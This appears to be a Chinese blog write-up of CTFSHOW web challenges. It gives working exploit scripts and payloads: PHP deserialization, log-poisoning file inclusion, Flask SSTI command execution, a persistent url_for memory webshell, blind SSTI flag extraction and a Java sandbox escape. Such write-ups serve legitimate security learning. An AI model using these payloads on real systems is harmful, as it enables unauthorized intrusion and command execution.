前言
昨天刚竣事的CTFSHOW只身杯,遗憾没有时间打,只能做个赛后复盘了。我主攻WEB方向,以是对WEB方向的题目进行一次复现,其他方向有兴趣相识的朋侪可以参考官方WP,链接我会放在参考部分。
1. 签到·好玩的PHP
打开环境,访问地点即可看到题目源码
- <?php
- error_reporting(0);
- highlight_file(__FILE__);
- class ctfshow {
- private $d = '';
- private $s = '';
- private $b = '';
- private $ctf = '';
- public function __destruct() {
- $this->d = (string)$this->d;
- $this->s = (string)$this->s;
- $this->b = (string)$this->b;
- if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
- $dsb = $this->d.$this->s.$this->b;
- if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
- if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
- if (md5($dsb) === md5($this->ctf)) {
- echo file_get_contents("/flag.txt");
- }
- }
- }
- }
- }
- }
- unserialize($_GET["dsbctf"]);
- 变量$dsb由$d,$s,$b三个变量拼接而成,要求这三个变量的值两两不等,拼接得到的字符串长度不凌驾3。
- 变量$ctf长度不凌驾3。
- 如果$ctf和$dsb不强等于,而MD5值相称,那么包罗"/flag.txt"。
- 传入参数dsbctf是序列化后的字符串,通过unserialize函数反序列化后调用__destruct方法实例化ctfshow类,触发发序列化毛病
强等于"==="需要变量类型和变量值都相称,一个思路使用PHP中的特殊浮点常量NAN和INF。
1.2 什么是NAN和INF?
在PHP中,NAN是一个特殊的浮点数值,表示非数值(Not-A-Number)。当一个运算无法计算效果时,好比零除以零,就会产生NAN。
PHP中的INF是一个特殊的浮点数值,表示无穷大(Infinity)。当数值凌驾PHP_FLOAT_MAX大概使用一些数学函数产生极大或极小的效果时,就会得到INF。
1.3 利用思路
1.3.1 php浮点数常量NAN和INF
使用浮点常量INF分别给ctf和dsb变量赋值,长度都为3,dsb是字符串类型,ctf是浮点型,由于MD5是以字符串形式进行加密的,以是他们的MD5值是相称的。如许就到达了绕过的目标。
payload:
- <?php
- class ctfshow {
- private $d = 'I';
- private $s = 'N';
- private $b = 'F';
- private $ctf = INF;
- }
- $a=new ctfshow();
- echo urlencode(serialize($a));
- //O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%22I%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%22N%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%22F%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bd%3AINF%3B%7D
2. 迷雾重重
下载题目源码,放到IDEA进行代码审计
看到IndexController.php
- <?php
- namespace app\controller;
- use support\Request;
- use support\exception\BusinessException;
- class IndexController
- {
- public function index(Request $request)
- {
-
- return view('index/index');
- }
- public function testUnserialize(Request $request){
- if(null !== $request->get('data')){
- $data = $request->get('data');
- unserialize($data);
- }
- return "unserialize测试完毕";
- }
- public function testJson(Request $request){
- if(null !== $request->get('data')){
- $data = json_decode($request->get('data'),true);
- if(null!== $data && $data['name'] == 'guest'){
- return view('index/view', $data);
- }
- }
- return "json_decode测试完毕";
- }
- public function testSession(Request $request){
- $session = $request->session();
- $session->set('username',"guest");
- $data = $session->get('username');
- return "session测试完毕 username: ".$data;
- }
- public function testException(Request $request){
- if(null != $request->get('data')){
- $data = $request->get('data');
- throw new BusinessException("业务异常 ".$data,3000);
- }
- return "exception测试完毕";
- }
- }
2.1 代码分析
testUnserialize接口没有发现存在触发反序列化毛病的可实例化类
testJson担当json格式数据,如果'name'的值等于'guest'的话就调用view方法,传入的参数为一个字符串'index/view'和我们传入的json格式数据$data,进行跟进
调用到 render方法,详细实现如下
- public static function render(string $template, array $vars, string $app = null, string $plugin = null): string
- {
- $request = request();
- $plugin = $plugin === null ? ($request->plugin ?? '') : $plugin;
- $configPrefix = $plugin ? "plugin.$plugin." : '';
- $viewSuffix = config("{$configPrefix}view.options.view_suffix", 'html');
- $app = $app === null ? ($request->app ?? '') : $app;
- $baseViewPath = $plugin ? base_path() . "/plugin/$plugin/app" : app_path();
- $__template_path__ = $app === '' ? "$baseViewPath/view/$template.$viewSuffix" : "$baseViewPath/$app/view/$template.$viewSuffix";
- if(isset($request->_view_vars)) {
- extract((array)$request->_view_vars);
- }
- extract($vars);
- ob_start();
- // Try to include php file.
- try {
- include $__template_path__;
- } catch (Throwable $e) {
- ob_end_clean();
- throw $e;
- }
- return ob_get_clean();
- }
- }
2.2 利用思路
要利用文件包罗毛病需要找到可被包罗的文件
- nginx apache 不存在,排除日志包罗的思路
- pearcmd 由于下令行启动 这里不能使用php-fpm的方式 包罗pearcmd.php来getshell
- session 文件包罗 需要找到网站部署的目录名字 进行绝对路径包罗 相对路径无法定位到session文件
- 文件上传未开启 无法包罗临时文件 和 文件上传 session
- 远程文件包罗 测试发现除了file协议 其他伪协议并未开启
一个思路是包罗php代码。include的包罗方式是先检查一遍所要包罗的文件是否存在,如果存在则包罗,不存在则报错。如果包罗的是php代码,include会先执行一遍php代码,再将未经url编码的报错信息写入日志文件。我们可以包罗执行下令的php代码,如'<? `cat /flag>flag.txt`;?>',将下令执行效果输出到可访问的文件目录下,如public目录,但是重定向输出执行效果到指定文件需要public目录的绝对路径。获取绝对路径的思路是利用/proc/进程PID/cmdline找到存在start.php的下令,因为cmdline包罗了运行start.php时文件的绝对路径。
/proc/pid目录介绍:
官方payload:
- import requests
- import time
- from datetime import datetime
- #注意 这里题目地址 应该https换成http
- url = "http://6d2d54ba-5db3-454c-b8b4-869e514c1376.challenge.ctf.show/"
- #Author: ctfshow h1xa
- def get_webroot():
- print("[+] Getting webroot...")
-
- webroot = ""
- for i in range(1,300):
- r = requests.get(url=url+'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i))
- time.sleep(0.2)
- if "start.php" in r.text:
- print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline")
- webroot = r.text.split("start_file=")[1][:-10]
- print(f"Found webroot: {webroot}")
- break
- return webroot
- def send_shell(webroot):
- #payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`ls%20/>{}/public/ls.txt`;?>"}}'.format(webroot)
- payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`cat%20/s00*>{}/public/flag.txt`;?>"}}'.format(webroot)
- r = requests.get(url=url+payload)
- time.sleep(1)
- if r.status_code == 500:
- print("[\033[31m*\033[0m] Shell sent successfully")
- else:
- print("Failed to send shell")
- def include_shell(webroot):
- now = datetime.now()
- payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format(webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d"))
- r = requests.get(url=url+payload)
- time.sleep(5)
- r = requests.get(url=url+'flag.txt')
- if "ctfshow" in r.text:
- print("=================FLAG==================\n")
- print("\033[32m"+r.text+"\033[0m")
- print("=================FLAG==================\n")
- print("[\033[31m*\033[0m] Shell included successfully")
- else:
- print("Failed to include shell")
- def exploit():
- webroot = get_webroot()
- send_shell(webroot)
- include_shell(webroot)
- if __name__ == '__main__':
- exploit()
3. ez_inject
3.1 题目分析
打开题目链接
有一个输入框,一个注册和一个登录
先随便注册一个用户test/test,登录之后看到Secret提示
看一下数据包
很显着是jwt伪造,那么jwt密钥是什么呢?
根据提示可以利用原型连污染区覆盖掉全局变量中的SECRET_KEY的值,接口是/register
- import requests
- import json
- url = "https://37dd227b-d7c6-48e4-a462-435c08715f44.challenge.ctf.show/register"
- payload = {
- "username": "test",
- "password": "test",
- "__init__": {"__globals__": {"app": {"config": {"SECRET_KEY": "baozongwi"}}}},
- }
- r = requests.post(url=url, json=payload)
- print(r.text)
接下来用test1用户登录, 再用flask-unsign伪造一个jwt
- flask-unsign --sign --cookie "{'is_admin': 1, 'username': 'test1'}" --secret 'baozongwi'
- eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0MSJ9.ZzYYAg.hqQmeTq4GCo4yfAofb0pngi0tpA
提示接口是/echo,
着实就是一开始的输入框
3.2 利用思路
3.2.1 url_for内存马
flask可以用url_for打内存马,一个测试demo
- from flask import Flask, request, render_template_string
- app = Flask(__name__)
- @app.route('/')
- def hello_world(): # put application's code here
- person = 'knave'
- if request.args.get('name'):
- person = request.args.get('name')
- template = '<h1>Hi, %s.</h1>' % person
- return render_template_string(template)
- if __name__ == '__main__':
- app.run()
- http://127.0.0.1:5000/?name={{url_for.__globals__['__builtins__']['eval']("__import__('os').system('calc')")}}
本题环境不需要使用“{{}}”
- url_for["\137\137\147\154\157\142\141\154\163\137\137"] ["\137\137\142\165\151\154\164\151\156\163\137\137"]['eval'] ("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec("global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(requ est.args.get(\'cmd\')).read())")==None else resp)", {'request':url_for["\137\137\147\154\157\142\141\154\163\137\137"] ['request'],'app':url_for["\137\137\147\154\157\142\141\154\163\137\137"] ['current_app']})
- //url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd','whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
设置了waf
3.2.2 cycler盲注
官方wp用到的是cycler进行盲注:
什么是cycler?
Cycler 是一个用于创建可组合样式循环的 Python 库。它主要用于数据可视化库(如 Matplotlib)中,以简化样式管理。Cycler 答应用户界说一组样式,并在绘图时循环使用这些样式,从而使图表更加雅观和同等。
检测payload:
- cycler["__in"+"it__"]["__glo"+"bals__"] ["__bui"+"ltins__"].__import__('builtins').open('/flag').read(1)[0]=='c'
官方payload:
- import requests
- import concurrent.futures
- url = "http://7d26c775-19b5-4001-88e3-fbba32c4e64c.challenge.ctf.show/echo"
- strings = "qwertyuiopasdfghjklzxcvbnm{}-12334567890"
- target = ""
- headers = {
- "Content-Type": "application/x-www-form-urlencoded",
- "cookie":"user=eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0In0.ZzC9AQ.hbEoNTSwLImc98ykp0j_EJ_VlnQ"
- }
- def check_character(i, j, string):
- payload = '''
- cycler["__in"+"it__"]["__glo"+"bals__"]
- ["__bui"+"ltins__"].__import__('builtins').open('/flag').read({})[{}]=='{}'
- '''.format(j + 1, j, string)
- data = {"message": payload}
- r = requests.post(url=url, data=data, headers=headers)
- return string if r.status_code == 200 and "your answer is True" in r.text else None
- with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
- for i in range(50):
- futures = []
- for j in range(50):
- for string in strings:
- futures.append(executor.submit(check_character, i, j, string))
- for future in concurrent.futures.as_completed(futures):
- result = future.result()
- if result:
- print(result)
- target += result
- if result == "}":
- print(target)
- exit()
4. ezzz_ssti
4.1 毛病检测
4.2 利用思路
4.2.1 常规payload
url_for:此函数全局空间下存在 eval() 和 os 模块
lipsum:此函数全局空间下存在 eval() 和 os 模块
以是我们可以使用 __globals__ 属性来获取函数当前全局空间下的全部模块、函数及属性
下列 Payload 即通过 __globals__ 属性获取全局空间中的 os 模块,并调用 popen() 函数来执行系统下令;因为 popen 函数返回的效果是个文件对象,因此需要调用 read() 函数来获取执行效果。
payload:
- {{url_for.__globals__.os.popen('whoami').read()}}
-
- {{lipsum.__globals__.os.popen('whoami').read()}}
长度检测脚本
- import os
- import requests
- import time
- url='http://83ddceb9-5ff3-4177-b538-4b5a5ef813e8.challenge.ctf.show/?user='
- s='s'
- headers={
- 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0',
- 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
- }
- for i in range(100):
- payload='s'*i
- res=requests.get(url=url+payload,headers=headers)
- print(i)
- if res.status_code==200 and "太长了bro" in res.text:
- print(len)
- print("url={}".format(url)+"\n"+"最大长度:{}".format(len(payload)-1))
- break
4.2.2 set+update方法绕过长度限定
最大长度40,可以使用jinja2中的set+update方法来分段保存payload,使用方法如下
- {%set x=config.update(a=config.update)%} //此时字典中a的值被更新为config全局对象中的update方法
- {%set x=config.a(f=lipsum.__globals__)%} //f的值被更新为lipsum.__globals__
- {%set x=config.a(o=config.f.os)%} //o的值被更新为lipsum.__globals__.os
- {%set x=config.a(p=config.o.popen)%} //p的值被更新为lipsum.__globals__.os.popen
- {{config.p("cat /f*").read()}}
- {%print(config)%} //输出config字典的所有键值对
- {%print(config.o)%} //输出
- import os
- import requests
- import time
- url='http://83ddceb9-5ff3-4177-b538-4b5a5ef813e8.challenge.ctf.show/?user='
- headers={
- 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0',
- 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
- }
- # {%set x=config.update(a=config.update)%} //此时字典中a的值被更新为config全局对象中的update方法
- # {%set x=config.a(f=lipsum.__globals__)%} //f的值被更新为lipsum.__globals__
- # {%set x=config.a(o=config.f.os)%} //o的值被更新为lipsum.__globals__.os
- # {%set x=config.a(p=config.o.popen)%} //p的值被更新为lipsum.__globals__.os.popen
- # {{config.p("cat /f*").read()}}
- #
- #
- # {%print(config)%} //输出config字典的所有键值对
- # {%print(config.o)%} //输出
- payload={'{%set x=config.update(a=config.update)%}','{%set x=config.a(f=lipsum.__globals__)%}','{%set x=config.a(o=config.f.os)%}','{%set x=config.a(p=config.o.popen)%}','{{config.p("cat /f*").read()}}'}
- print(len(payload))
- for s in payload:
- res=requests.get(url=url+s,headers=headers)
- try:
- if res.status_code==200 and "ctfshow" in res.text:
- print(res.text)
- break
- time.sleep(1)
- except:
- print("Erro: "+"\n"+res.text)
- #check
- # req=requests.get(url+"{%print(config.o)%}",headers=headers)
- # if req.status_code==200:
- # print(req.text+"\n"+len(req.text))
5. 简朴的文件上传
5.1 毛病检测
随便上传一个jar文件
文件巨细有限定
上传一个小一点的
下方输入文件名然后Execute,发现有执行回显
上传Runtime的getshell包,发现没有执行权限
如许的报错是因为java -jar 下令前面加了 -Djava.securityManager 参数,policy文件内容未知,jvm对 uploads 目录有读权限,同时有loadLibrary.*权限
测试发现题目并未对上传的文件内容做检测
5.2 利用思路
写一个包罗eval方法的本地so格式的libary,通过修改文件后缀进行上传,写一个外部的jar包,通过加载so文件并调用so文件中的eval方法进行下令执行
5.2.1 创建本地so文件
so文件:
https://ctfshow-1257200238.cos.ap-shanghai.myqcloud.com/static/file/dsbctf/CTFshowCodeManager.jar
当然也可以自己写,方法也不一定是eval,更多的内容留给各位自行去探索啦!
5.2.1 外部jar包调用本地so文件
IDEA自己构建一个jar包来加载并利用调用so文件中的eval方法。构建的时候注意jdk版本不要太高,否则可能会执行失败,我用的jdk是1.8
在项目标out目录下找到jar包并上传执行
6. 参考
官方wp:https://ctf-show.feishu.cn/docx/R6udd58bxoQGQMxFphncZq8rn5e
深度分析Linux进程的内部机制:一探/proc/pid的奥秘_mountinfo 解析-CSDN博客
Cycler 开源项目教程-CSDN博客
python内存马学习_flask内存马-CSDN博客
Flask框架中的页面跳转和重定向(url_for,redirect)_flask redirect-CSDN博客
利用pearcmd.php文件包罗拿shell(LFI)_pearcmd文件包罗-CSDN博客
Python Flask SSTI 之 长度限定绕过_python绕过长度限定的内置函数-CSDN博客
结语
好久没打CTF了...加油吧!
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
